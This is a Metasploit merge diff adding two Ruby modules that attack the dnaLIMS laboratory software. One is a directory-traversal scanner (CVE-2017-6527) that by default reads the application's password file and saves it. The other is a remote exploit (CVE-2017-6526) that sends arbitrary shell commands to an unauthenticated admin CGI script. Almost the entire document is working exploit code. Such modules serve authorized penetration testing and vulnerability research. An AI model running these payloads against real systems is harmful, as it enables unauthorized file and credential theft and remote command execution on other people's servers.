Land rapid7#8079, exploit and aux for dnaLims

Author: h00die

modules/auxiliary/scanner/http/dnalims_file_retrieve.rb

@@ -0,0 +1,81 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Auxiliary::Scanner
+  include Msf::Auxiliary::Report
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'DnaLIMS Directory Traversal',
+      'Description'    => %q{
+          This module exploits a directory traversal vulnerability found in dnaLIMS.
+        Due to the way the viewAppletFsa.cgi script handles the 'secID' parameter, it is possible
+        to read a file outside the www directory.
+      },
+      'References'     =>
+        [
+          ['CVE', '2017-6527'],
+          ['US-CERT-VU', '929263'],
+          ['URL', 'https://www.shorebreaksecurity.com/blog/product-security-advisory-psa0002-dnalims/']
+        ],
+      'Author'         =>
+        [
+          'h00die <[email protected]>',    # Discovery, PoC
+          'flakey_biscuit <[email protected]>'  # Discovery, PoC
+        ],
+      'License'        => MSF_LICENSE,
+      'DisclosureDate' => "Mar 8 2017"
+    ))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path to dnaLIMS', '/cgi-bin/dna/']),
+        OptString.new('FILE', [ true,  "The path to the file to view", '/home/dna/spool/.pfile']), # password db for app
+        OptInt.new('DEPTH', [true, 'The traversal depth', 4])
+      ], self.class)
+
+    deregister_options('RHOST')
+  end
+
+
+  def run_host(ip)
+    file     = (datastore['FILE'][0,1] == '/') ? datastore['FILE'] : "#{datastore['FILE']}"
+    traverse = "../" * datastore['DEPTH']
+    uri      = normalize_uri(target_uri.path)
+    base     = File.dirname("#{uri}/.")
+
+    print_status("Requesting: #{file} - #{rhost}")
+    res = send_request_cgi({
+      'uri'      => "#{base}/viewAppletFsa.cgi",
+      'vars_get' => { 'secID' => "#{traverse}#{file}%00",
+                     'Action' => 'blast',
+                    'hidenav' => '1'
+      }
+    })
+
+    if not res
+      print_error("No response from server.")
+      return
+    end
+
+    if res.code != 200
+      print_error("Server returned a non-200 response (body will not be saved):")
+      print_line(res.to_s)
+      return
+    end
+
+    vprint_good(res.body)
+    p = store_loot('dnaLIMS.traversal.file', 'application/octet-stream', ip, res.body, File.basename(file))
+    print_good("File saved as: #{p}")
+  end
+
+end
+
+

modules/exploits/linux/http/dnalims_admin_exec.rb

@@ -0,0 +1,107 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'dnaLIMS Admin Module Command Execution',
+      'Description'    => %q{
+          This module utilizes an administrative module which allows for
+       command execution.  This page is completely unprotected from any
+       authentication when given a POST request.
+      },
+      'Author'         =>
+        [
+          'h00die <[email protected]>',  # Discovery, PoC
+          'flakey_biscuit <[email protected]>' # Discovery, PoC
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['CVE', '2017-6526'],
+          ['US-CERT-VU', '929263'],
+          ['URL', 'https://www.shorebreaksecurity.com/blog/product-security-advisory-psa0002-dnalims/']
+        ],
+      'Platform'       => %w( linux unix ),
+      'Arch'           => ARCH_CMD,
+      'Payload'        =>
+        {
+          'Space'       => 1024,
+          'DisableNops' => true,
+          'Compat'      =>
+            {
+              'RequiredCmd' => 'perl' # software written in perl, and guaranteed to be there
+            }
+        },
+      'Targets'        =>
+        [
+          [ 'Automatic Target', { }]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Mar 8 2017'
+      ))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path to dnaLIMS', '/cgi-bin/dna/'])
+      ], self.class
+    )
+  end
+
+  def check
+    begin
+      res = send_request_cgi(
+        'uri'       => normalize_uri(target_uri.path, 'sysAdmin.cgi'),
+        'method'    => 'POST',
+        'vars_post'  => {
+          'investigator' => '',
+          'username' => '',
+          'navUserName' => '',
+          'Action' => 'executeCmd',
+          'executeCmdData' => 'perl -V'
+        }
+      )
+      if res && res.body
+        if /Summary of/ =~ res.body
+          Exploit::CheckCode::Vulnerable
+        else
+          Exploit::CheckCode::Safe
+        end
+      else
+        Exploit::CheckCode::Safe
+      end
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+    end
+  end
+
+  def exploit
+    begin
+      vprint_status('Sending Exploit')
+      res = send_request_cgi(
+        'uri'       => normalize_uri(target_uri.path, 'sysAdmin.cgi'),
+        'method'    => 'POST',
+        'vars_post'  => {
+          'investigator' => '',
+          'username' => '',
+          'navUserName' => '',
+          'Action' => 'executeCmd',
+          'executeCmdData' => payload.encoded,
+        }
+      )
+      vprint_good(res.body)
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+    end
+  end
+end
+
+